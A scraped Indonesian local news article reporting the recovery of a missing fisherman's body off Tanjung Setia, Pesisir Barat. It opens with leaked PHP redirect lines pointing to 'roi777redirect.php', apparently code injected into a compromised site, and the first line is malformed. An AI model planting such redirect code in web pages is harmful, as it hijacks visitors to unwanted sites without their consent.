header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Seorang Nelayan Ditemukan Mengambang di Tengah Laut -
Seorang Nelayan Ditemukan Mengambang di Tengah Laut

TRANSLAMPUNG.COM, PESIBAR – Jenazah seorang nelayan, Saiful bin Alani (40) warga Pekon Tanjung Setia,  Kecamatan Pesisir Selatan,  Kabupaten Pesisir Barat (Pesibar) di temukan mengambang di tengah laut Tanjung Setia, Kecamatan setempat Pada hari Minggu (8/7).

Menurut masyarakat setempat,  Muhamad Ali Idrus mengatakan pada waktu pagi tadi sekiranya pukul 06:30 WIB masyarakat setempat dikejutkan dengan penemuan mayat seorang nelayan yang hilang dan sudah lama di cari oleh keluarga dengan di bantu oleh personil Polisi air (Polair) dan Basarnas kabupaten Setempat.

“Alhamdulilah hari ini jenazah, Saiful sudah ditemukan berkat karja keras BPBD setempat dan Polair, polud, Basarnas,  “ujarnya, Ali kepada Translampung.com ini.

Dijelaskannya, setelah dievakuasi di pinggir pantai jenazah tersebut langsung di bawa menggunakan kendaraan Basarnas setempat ke Puskesmas Biha guna untuk di lakukan visum.

“Ya menurut anggota Basarnas yang mengevakuasi mau dibawa ke Puskesmas Biha untuk dibersihkan jenazahnya, “pungkasnya.

Di tempat terpisah Kepala Puskesmas Biha,  Akmal membenarkan bahwa jenazah seorang nelayan yang hilang pada hari Kamis sore (5/7) sudah di temukan dan kini berada di Puskesmas setempat guna dilakukan Visum dan disempurnakan alias dikapani pada pukul 08:30WIB tadi pagi dengan diantar langsung oleh Basarnas Kabupaten Pesibar.

“korban telah berhasil ditemukan, dan setelah dilakukan visum dan dibersihkan langsung kita akan serahkan kapada keluarga duka di Pekon Tanjung Setia secapatnya,”bebernya.

Menurut pantawan translpung.com di lapangan, seperti yang diketahui,  Saiful bin Alani telah hilang semenjak Kamis . Saiful berpropesi sebagai nelayan di Kabupaten Pesibar, dan di kabarkan hilang di perairan laut mandiri sejati. (r7)

News Reporter